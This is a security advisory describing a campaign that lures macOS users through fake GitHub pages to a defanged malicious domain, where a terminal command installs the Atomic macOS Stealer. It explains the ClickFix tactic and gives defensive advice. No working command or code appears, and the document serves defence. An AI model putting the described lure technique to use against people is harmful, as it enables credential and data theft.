LastPass has issued a warning about a widespread cyber campaign targeting macOS users. Malicious software is being disguised as legitimate applications and distributed through fake GitHub repositories. Read this Cybersecurity Threat Advisory to stay informed and protect your data.
What is the threat?
Hackers are targeting macOS users by creating fake GitHub pages that appear to belong to trusted companies. They use search engine optimization to push these pages to the top of search results, making them seem legitimate. When someone clicks the link, they’re taken to a site called macprograms-pro[.]com, where they’re instructed to run a command in their terminal. That command quietly downloads a file labeled as an “Update” to the computer’s temporary folder. In reality, it’s Atomic macOS Stealer (AMOS), a type of malware that has been used in attacks since 2023 and is designed to steal sensitive information.
Why is it noteworthy?
AMOS operates as malware-as-a-service, available for $1,000 per month. It’s designed to steal sensitive data from infected machines. Recently, its developers added a backdoor, allowing attackers persistent and stealthy access to compromised systems. According to LastPass, this campaign impersonates over 100 software solutions, including:
- 1Password
- Confluence
- Fidelity
- Gemini
- Adobe After Effects
- Thunderbird
- SentinelOne
What is the exposure or risk?
Hackers are going after a wide range of industries, including financial services, password managers, tech companies, AI platforms, and crypto wallets. They’re setting up fake GitHub pages using different usernames and Mac-related terms to make the sites look real. These attacks fall under a tactic called “ClickFix,” where hackers exploit people’s trust in search engines and rely on the fact that many users aren’t familiar with terminal commands. When someone runs the suggested command, it quietly compromises their system without them realizing what just happened.
What are the recommendations?
Barracuda recommends the following actions to prevent this attack:
- Question every command before you run it. Hackers use ClickFix attacks to trick users into executing harmful commands by taking advantage of their trust in search results and unfamiliarity with terminal instructions.
- Confirm that the official website of the vendor or project when searching for software online. If you don’t see a macOS version there, it’s likely that any unofficial alternative is fake.
- Download apps only from official domains and app stores.
References
For more in-depth information of the above recommendations, please visit the following links:
- https://www.bleepingcomputer.com/news/security/lastpass-fake-password-managers-infect-mac-users-with-malware/
- https://www.securityweek.com/widespread-infostealer-campaign-targeting-macos-users/
- https://www.pcmag.com/news/hacker-targets-mac-users-looking-for-lastpass-downloads-on-search-engines
If you have any questions about this Cybersecurity Threat Advisory, don’t hesitate to get in touch with Barracuda Managed XDR’s Security Operations Center.
This post originally appeared on Smarter MSP.
